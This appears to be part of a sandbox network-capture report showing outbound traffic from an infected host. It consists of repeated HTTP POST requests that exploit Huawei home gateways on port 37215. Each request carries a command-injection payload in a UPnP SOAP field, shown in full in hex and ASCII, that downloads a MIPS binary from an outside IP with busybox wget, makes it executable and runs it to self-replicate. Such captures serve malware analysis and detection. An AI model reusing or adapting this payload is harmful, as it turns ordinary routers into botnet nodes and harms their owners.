                                                        605192.168.2.2338052157.199.195.6737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.491903067 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        606192.168.2.233807241.86.24.19637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.491981983 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        607192.168.2.2354370157.70.199.17337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.491993904 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        608192.168.2.2343944197.247.0.12637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492008924 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        609192.168.2.2338472197.194.27.3837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492083073 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        610192.168.2.2351564197.123.58.10637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492094994 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        611192.168.2.234062413.48.76.11837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492103100 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        612192.168.2.2339962197.107.248.8037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492192984 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        613192.168.2.234712641.135.198.7337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492204905 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        614192.168.2.2340698136.129.42.8337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492348909 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        615192.168.2.2349670157.152.145.5137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.492363930 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
